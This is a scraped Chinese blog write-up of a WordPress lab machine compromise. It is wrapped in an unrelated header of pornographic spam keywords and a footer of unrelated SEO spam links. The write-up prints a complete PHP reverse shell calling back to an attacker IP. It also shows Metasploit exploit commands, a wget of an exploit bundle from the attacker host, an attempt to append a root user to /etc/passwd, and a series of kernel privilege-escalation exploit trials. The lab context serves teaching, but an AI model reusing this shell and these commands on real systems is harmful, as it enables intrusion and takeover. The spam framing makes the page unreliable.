中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當前位置: 首頁 > news >正文

邯鄲建設(shè)網(wǎng)站的公司廣告引流推廣平臺

邯鄲建設(shè)網(wǎng)站的公司,廣告引流推廣平臺,鄭州專業(yè)制作證件,wordpress 自制主題提示:本文記錄了博主的一次普通的打靶經(jīng)歷 目錄 1. 主機發(fā)現(xiàn)2. 端口掃描3. 服務枚舉4. 服務探查4.1 FTP服務探查4.2 Apache服務探查4.2.1 wpscan掃描4.2.2 Metasploit神器4.2.3 手工探查頁面4.2.3.1 Appearance Editor4.2.3.2 Plugins Editor 5. 提權(quán)5.1 系統(tǒng)信息枚…

提示:本文記錄了博主的一次普通的打靶經(jīng)歷

目錄

  • 1. 主機發(fā)現(xiàn)
  • 2. 端口掃描
  • 3. 服務枚舉
  • 4. 服務探查
    • 4.1 FTP服務探查
    • 4.2 Apache服務探查
      • 4.2.1 wpscan掃描
      • 4.2.2 Metasploit神器
      • 4.2.3 手工探查頁面
        • 4.2.3.1 Appearance Editor
        • 4.2.3.2 Plugins Editor
  • 5. 提權(quán)
    • 5.1 系統(tǒng)信息枚舉
    • 5.2 定時任務枚舉
    • 5.3 /etc/passwd文件探查
    • 5.4 枚舉可執(zhí)行文件
      • 5.4.1 ntfs-3g提權(quán)
      • 5.4.2 ping6提權(quán)
    • 5.5 EXP提權(quán)
      • 5.5.1 40871.c
      • 5.5.2 41458.c
      • 5.5.3 43345.c
      • 5.5.4 45553.c
      • 5.5.5 45010.c
      • 5.5.6 44298.c
      • 5.5.7 43418.c & 47169.c


1. 主機發(fā)現(xiàn)

目前只知道目標靶機在65.xx網(wǎng)段,通過如下的命令,看看這個網(wǎng)段上在線的主機。

$ nmap -sP 192.168.65.0/24

在這里插入圖片描述
鎖定目標靶機地址為192.168.65.140。

2. 端口掃描

通過下面的命令進行一下全端口掃描,看一下靶機都開放了哪些端口。

$ sudo nmap -p- 192.168.65.140

在這里插入圖片描述
嗯,開的端口不多,等會兒逐個試試看。

3. 服務枚舉

通過下面的命令,枚舉一下開放的端口上都運行了什么服務。

$ sudo nmap -p21,22,80 -A -sT -sV 192.168.65.140

在這里插入圖片描述
也都是一些常規(guī)的服務,稍等會兒逐個探查一下看看。

4. 服務探查

4.1 FTP服務探查

直接嘗試匿名登錄一下看看。

$ ftp 192.168.65.140

在這里插入圖片描述
嗯,可以匿名登錄,接下來看看FTP上有沒有我們感興趣的內(nèi)容。
在這里插入圖片描述
整個FTP服務下是空的,沒有找到任何內(nèi)容,暫時放一邊。

4.2 Apache服務探查

直接用瀏覽器訪問一下看看。
在這里插入圖片描述
額,是一個類似于蛇的三維動圖,點擊以后,會連接到一個/2.gif的三維動圖,如下圖。
在這里插入圖片描述
然后就沒有任何其它內(nèi)容了,還是遍歷一下目錄吧。

$ dirsearch -u http://192.168.65.140

在這里插入圖片描述
內(nèi)容也不少,逐個進去看看。
首先,通過/CHANGELOG頁面可以知道,80端口上運行的是基于Apache的一個叫LEPTON CMS的服務。
在這里插入圖片描述
繼續(xù)往下看,在/INSTALL頁面下可以知道,服務用到了PHP和MySQL,并且關(guān)閉了PHP的安全模式。
在這里插入圖片描述
繼續(xù)往下,通過/robots.txt可以發(fā)現(xiàn)站點下還有個/wordpress目錄,跟我們目錄枚舉的結(jié)果是一樣的。
在這里插入圖片描述
接下來有wordpress的登錄頁面/wordpress/wp-login.php
在這里插入圖片描述
還有wordpress的主頁/wordpress。
在這里插入圖片描述

4.2.1 wpscan掃描

既然有wordpress服務,那我們就用wpscan掃描一下看看。

$ wpscan --url http://192.168.65.140/wordpress

在這里插入圖片描述
發(fā)現(xiàn)的內(nèi)容不少,還是先看看登錄頁面會不會枚舉出用戶或者爆破出密碼吧。很幸運的是在嘗試admin用戶的時候,直接通過弱密碼admin登錄進去了。
在這里插入圖片描述
直接省掉了好多事,快速瀏覽一下wp-admin控制臺,可以添加Media,也可以添加Plugins,這樣我們就可能通過添加Media構(gòu)建反彈shell,或者添加有漏洞的Plugin來做進一步的開發(fā)。
我們直接吧之前構(gòu)建的payload.php上傳試試看,payload文件的內(nèi)容如下。

GIF8;
<?phpset_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.65.202';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;if (function_exists('pcntl_fork')) {// Fork and have the parent process exit$pid = pcntl_fork();if ($pid == -1) {printit("ERROR: Can't fork");exit(1);}if ($pid) {exit(0);  // Parent exits}// Make the current process a session leader// Will only succeed if we forkedif (posix_setsid() == -1) {printit("Error: Can't setsid()");exit(1);}$daemon = 1;
} else {printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}// Change to a safe directory
chdir("/");// Remove any umask we inherited
umask(0);//
// Do the reverse shell...
//// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {printit("$errstr ($errno)");exit(1);
}// Spawn shell process
$descriptorspec = array(0 => array("pipe", "r"),  // stdin is a pipe that the child will read from1 => array("pipe", "w"),  // stdout is a pipe that the child will write to2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);$process = proc_open($shell, $descriptorspec, $pipes);if (!is_resource($process)) {printit("ERROR: Can't spawn shell");exit(1);
}// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);printit("Successfully opened reverse shell to $ip:$port");while (1) {// Check for end of TCP connectionif (feof($sock)) {printit("ERROR: Shell connection terminated");break;}// Check for end of STDOUTif (feof($pipes[1])) {printit("ERROR: Shell process terminated");break;}// Wait until a command is end down $sock, or some// command output is available on STDOUT or STDERR$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);// If we can read from the TCP socket, send// data to process's STDINif (in_array($sock, $read_a)) {if ($debug) printit("SOCK READ");$input = fread($sock, $chunk_size);if ($debug) printit("SOCK: $input");fwrite($pipes[0], $input);}// If we can read from the process's STDOUT// send data down tcp connectionif (in_array($pipes[1], $read_a)) {if ($debug) printit("STDOUT READ");$input = fread($pipes[1], $chunk_size);if ($debug) printit("STDOUT: $input");fwrite($sock, $input);}// If we can read from the process's STDERR// send data down tcp connectionif (in_array($pipes[2], $read_a)) {if ($debug) printit("STDERR READ");$input = fread($pipes[2], $chunk_size);if ($debug) printit("STDERR: $input");fwrite($sock, $input);}
}fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {if (!$daemon) {print "$string\n";}
}?>

在這里插入圖片描述
嗯,上傳失敗了,沒有逃過wordpress的格式檢查,后來嘗試用zip格式,仍然失敗。接下來還是使用一下Metasploit神器吧。

4.2.2 Metasploit神器

先搜索一下關(guān)鍵字wordpress試試看。
在這里插入圖片描述
還真是不少,篩選出所有Rank為excellent并且Check為Yes的項,如下。
在這里插入圖片描述
結(jié)合前面的wpscan搜索結(jié)果,序號為11的xmlRPC的漏洞可能是存在的我們先試試看,再不行就安裝一個由漏洞的插件。

msf6 > use exploit/unix/webapp/php_xmlrpc_eval
msf6 exploit(unix/webapp/php_xmlrpc_eval) > set PATH /wordpress/xmlrpc.php
msf6 exploit(unix/webapp/php_xmlrpc_eval) > set RHOSTS 192.168.65.140
msf6 exploit(unix/webapp/php_xmlrpc_eval) > set payload payload/cmd/unix/reverse_php_ssl
msf6 exploit(unix/webapp/php_xmlrpc_eval) > run

在這里插入圖片描述
失敗了,還是看看嘗試安裝一個有漏洞的plugin吧,這里用一下backup guard。

msf6 > use exploit/multi/http/wp_plugin_backup_guard_rce
msf6 exploit(multi/http/wp_plugin_backup_guard_rce) > show options

在這里插入圖片描述
從上面的輸出來看,需要安裝小于1.6.0版本的插件,在插件管理里面竟然沒有搜索到,直接下載(https://downloads.wordpress.org/plugin/backup.1.5.8.zip),然后上傳到靶機上。
在這里插入圖片描述
這條路子也失敗了,貌似不允許創(chuàng)建目錄,如下圖。
在這里插入圖片描述

4.2.3 手工探查頁面

到此為止已經(jīng)黔驢技窮了,實在沒有找到合適的突破口,還是回到admin登錄后的頁面手工仔細點擊一下看看吧。
功夫不負有心人,我們在Appearance和Plugins菜單下面都發(fā)現(xiàn)了Editor的入口,并且都可以支持編輯php的內(nèi)容,如下圖。
在這里插入圖片描述
在這里插入圖片描述
這樣一來,貌似我們可以直接在編輯php腳本的時候?qū)懭敕磸梥hell,接下來我們分別在這兩處試一下。

4.2.3.1 Appearance Editor

直接將我們前面的payload.php文件中的<?php ?>中間的內(nèi)容拷貝到下圖中第一個所示的404.php中,注意語法。
在這里插入圖片描述
拷進去之后,先不急著保存(防止一保存就自動執(zhí)行,其實我也不懂,瞎猜的),在kali上開啟4444端口的監(jiān)聽,然后再回來點擊頁面底下的“Update File”按鈕。
在這里插入圖片描述
提示更新成功了,但是并沒有建立反彈shell,我們嘗試從瀏覽器觸發(fā)一個能夠返回404的請求試試(就請求這個192.168.65.140/wordpress/wp-admin/theme-editor.php?file=404.php試試看吧)。

在這里插入圖片描述
請求成功了,但是仍然沒有反彈,看來光請求沒有,得觸發(fā)http 404才可以,我們請求一下192.168.65.140/wordpress/wp-admin/theme-editorrtrrr.php(這個頁面肯定不存在)試試看。

在這里插入圖片描述
這次返回404了,但是仍然沒有反彈,不應該啊。經(jīng)過仔細分析,根本原因還是不了解wordpress的themes的機制,這個頁面的真實地址應該是http://192.168.65.140/wordpress/wp-content/themes/twentyfourteen/404.php,直接訪問這個地址的時候,成功建立的反彈shell。

在這里插入圖片描述

4.2.3.2 Plugins Editor

接下來,我們在Plugins的Editor下面通過同樣的手法試一下,細節(jié)不再贅述,如下圖。
在這里插入圖片描述
可惜搞了半天也不知道這些內(nèi)容寫進去以后怎么保存,只能放棄,接下來還是好好研究提權(quán)吧。

5. 提權(quán)

先嘗試一下弱密碼提權(quán)。
在這里插入圖片描述
通過下面的命令優(yōu)化一下shell試試看。

$ /usr/bin/python3.5 -c "import pty;pty.spawn('/bin/bash')"

在這里插入圖片描述
嗯,這次可以了,不存在弱密碼。

5.1 系統(tǒng)信息枚舉

$ uname -a
$ cat /etc/*-release
$ getconf LONG_BIT

在這里插入圖片描述
目標靶機是64位的Ubuntu 16.04.2 LTS版本,內(nèi)核是4.4.0-62-generic。

5.2 定時任務枚舉

在這里插入圖片描述
沒有我們感興趣的內(nèi)容。

5.3 /etc/passwd文件探查

www-data@ubuntu:/$ cat /etc/passwd | grep -v "nologin"

在這里插入圖片描述
除了root用戶之外,還有一個用戶btrisk值得我們注意一下。接下來嘗試向passwd文件中寫入一個用戶試試看。

$ echo "testuser:$1$IbaVSVwa$v6h3hVYDvjI.y0q2Kq0fg.:0:0:root:/root:/bin/bash" >> /etc/passwd

在這里插入圖片描述
看來想多了,確實沒有權(quán)限,后面需要的時候爆破一下這個用戶。

5.4 枚舉可執(zhí)行文件

先直接用一下sudo -l試試看。
在這里插入圖片描述
當前用戶不具備直接sudo的權(quán)限,需要密碼才行。還是枚舉一下root用戶所有,其它用戶可執(zhí)行的程序吧。

$ find / -type f -user root -perm -o=w 2>/dev/null | grep -v "/sys/" | grep -v "/proc/"

在這里插入圖片描述
查詢結(jié)果竟然是空的,再通過下面的命令試試看。

www-data@ubuntu:/$ find / -user root -perm -4000 2>/dev/null

在這里插入圖片描述
這次搜出來了一些,上面標識出來的兩個可以重點關(guān)注一下。

5.4.1 ntfs-3g提權(quán)

google了一下,這個程序確實可以用于提權(quán),主要是基于CVE漏洞CVE-2017-0358。ntfs-3g是一個NTFS讀寫驅(qū)動程序,具備setuid的權(quán)限,,該驅(qū)動在調(diào)用modprobe時沒有初始化環(huán)境變量,本地用戶可以基于這一點進行提權(quán),該漏洞存在于load_fuse_module()函數(shù)中。
參照searchsploit里面編號為41356的內(nèi)容(https://www.exploit-db.com/exploits/41356),先從https://bugs.chromium.org/p/project-zero/issues/detail?id=1072下載對應的ntfs-3g-modprobe-unsafe.tar文件。
通過下面的命令在卡里上啟動http服務,用于上傳我們下載的tar文件

$ python3 -m http.server 80

通過下面的命令將tar文件下載到目標靶機的/tmp目錄下。

www-data@ubuntu:/$ wget http://192.168.65.202/ntfs-3g-modprobe-unsafe.tar -O /tmp/ntfs-3g-modprobe-unsafe.tar

然后執(zhí)行下面的命令。

www-data@ubuntu:/tmp$ chmod 775 ntfs-3g-modprobe-unsafe.tar
www-data@ubuntu:/tmp$ tar xf ntfs-3g-modprobe-unsafe.tar
www-data@ubuntu:/tmp$ cd ntfs-3g-modprobe-unsafe
www-data@ubuntu:/tmp/ntfs-3g-modprobe-unsafe$ ./compile.sh

在這里插入圖片描述
結(jié)果在執(zhí)行編譯的時候出錯了,在靶機上編譯不了,我們用同樣的方法,在本地的ubuntu(本地是16.04.7 LTS)上編譯試試看。
在這里插入圖片描述
在本地的Ubuntu上編譯成功了,如上圖所示,我們把這整個目錄重新打包上傳到目標靶機試試看。

www-data@ubuntu:/tmp$ tar xf ntfs-3g-modprobe-unsafe.tar 
www-data@ubuntu:/tmp/ntfs-3g-modprobe-unsafe$ chmod 775 *

在這里插入圖片描述
額,執(zhí)行失敗了,可能是漏洞被堵上了,在本地的Ubuntu上試試看。
在這里插入圖片描述
確實也是不成功的,看來這個EXP還是有些問題。接下來試試searchsploit里面編號為41240的EXP。

在這里插入圖片描述
這個在目標靶機上是提權(quán)失敗的,需要make工具,靶機上應該是沒有,我們在本地Ubuntu上試試看。
在這里插入圖片描述
同樣是失敗的,不糾結(jié)了,還是試試ping6吧。

5.4.2 ping6提權(quán)

google了一下,沒有找到ping6提權(quán)的相關(guān)記錄,暫時放棄,直接跳過。

5.5 EXP提權(quán)

沒有辦法了,還是搜索一下對應的EXP試試看吧。
在這里插入圖片描述
對應的內(nèi)容還是比較多了,逐個試試吧,為了提高效率,每個exp都是先在本地Ubuntu上編譯。

5.5.1 40871.c

在這里插入圖片描述
第一個40871失敗。

5.5.2 41458.c

在這里插入圖片描述
嗯,比較幸運,第二個,41458提權(quán)成功,進一步驗證一下。
在這里插入圖片描述
確實提權(quán)成功了,獲取一下flag。
在這里插入圖片描述
額,竟然沒有發(fā)現(xiàn)flag,然后直接cd到/root目錄看看,發(fā)現(xiàn)沒反應,靶機掛掉了,重啟試試,獲取flag的過程中必然會掛掉,可能是41458這個EXP提權(quán)還有些缺陷。

5.5.3 43345.c

在這里插入圖片描述
竟然是上圖所示的樣子,數(shù)字到了2000多都沒有結(jié)束,在本地的Ubuntu下也是同樣的現(xiàn)象,果斷放棄。

5.5.4 45553.c

在這里插入圖片描述
一開始看著都是很正常的,最終還是失敗了,看來還是EXP的原因,在本地Ubuntu上也是同樣的現(xiàn)象。

5.5.5 45010.c

接下來試試45010。
在這里插入圖片描述
貌似45010也是可以提權(quán)成功的,進一步驗證一下。
在這里插入圖片描述
妥妥的,再次嘗試查找一下flag。
在這里插入圖片描述
額,還是沒有flag信息,不過這次靶機是沒有掛掉的,還在正常運行著。會不會跟之前的docker提權(quán)一樣,放到了/mnt/root下面呢,試試看。
在這里插入圖片描述
也是沒有的,太異常了,全盤搜索試試看。
在這里插入圖片描述
真是見鬼了。先不管了,后面還剩三個EXP,索性都試試吧。

5.5.6 44298.c

在這里插入圖片描述
我擦,這個簡直是暴力小蘿莉啊,進一步試試看。

在這里插入圖片描述
順暢的很

5.5.7 43418.c & 47169.c

在這里插入圖片描述
嗯,這個不行,在本地的Ubuntu上也是失敗的,再試試最后一個47169。
在這里插入圖片描述
也失敗了,不糾結(jié)了,本次打靶到此為止,遺憾的是一直沒找到flag。

http://www.risenshineclean.com/news/54936.html

相關(guān)文章:

  • 網(wǎng)站開發(fā)與維護能做什么職業(yè)互聯(lián)網(wǎng)營銷師證書含金量
  • 做網(wǎng)站必須要備案嗎免費行情軟件網(wǎng)站大全
  • 怎么識別網(wǎng)站是用什么語言做的網(wǎng)絡推廣崗位職責和任職要求
  • 統(tǒng)計網(wǎng)站建設(shè)青島設(shè)計優(yōu)化公司
  • 電子商務網(wǎng)站項目預算選擇寧波seo優(yōu)化公司
  • 旅游網(wǎng)站制作過程教育培訓機構(gòu)招生方案
  • div css做網(wǎng)站微信社群營銷
  • ui設(shè)計和網(wǎng)站開發(fā)官方網(wǎng)站營銷
  • 泉州開發(fā)網(wǎng)站的公司有哪些網(wǎng)站推廣費用
  • 如何找網(wǎng)站互聯(lián)網(wǎng)公司
  • 企業(yè)信息管理系統(tǒng)er圖青島網(wǎng)絡優(yōu)化代理
  • 網(wǎng)站建設(shè)好如何開通天堂網(wǎng)長尾關(guān)鍵詞挖掘網(wǎng)站
  • 育才網(wǎng)站建設(shè)百度推廣一級代理商名單
  • 濟南中建設(shè)計院網(wǎng)站權(quán)重查詢工具
  • 成都網(wǎng)站建設(shè)小程序網(wǎng)絡營銷的營銷理念
  • 石家莊做家教網(wǎng)站軟文發(fā)布平臺排名
  • 寧波外貿(mào)公司seo網(wǎng)站管理
  • 無極分期網(wǎng)站營銷型網(wǎng)站建設(shè)多少錢
  • 東莞市網(wǎng)站建設(shè)制作設(shè)計平臺溫州seo品牌優(yōu)化軟件
  • 十堰網(wǎng)站建設(shè)費用怎么給自己的公司做網(wǎng)站
  • 建設(shè)網(wǎng)工程信息上??焖賰?yōu)化排名
  • 怎么給網(wǎng)站做懶加載快速網(wǎng)站推廣優(yōu)化
  • 成都網(wǎng)站設(shè)計費用濟寧seo優(yōu)化公司
  • wordpress圖片備用地址遼寧好的百度seo公司
  • 衡水企業(yè)做網(wǎng)站費用安卓排名優(yōu)化
  • php做自己的網(wǎng)站成功的營銷案例及分析
  • 怎么給網(wǎng)站動態(tài)做偽靜態(tài)優(yōu)化公司治理結(jié)構(gòu)
  • 做爰全過程教育網(wǎng)站百度競價排名官網(wǎng)
  • 手機和電腦網(wǎng)站分開做引擎優(yōu)化搜索
  • 家庭寬帶做網(wǎng)站穩(wěn)定鄭州網(wǎng)站制作公司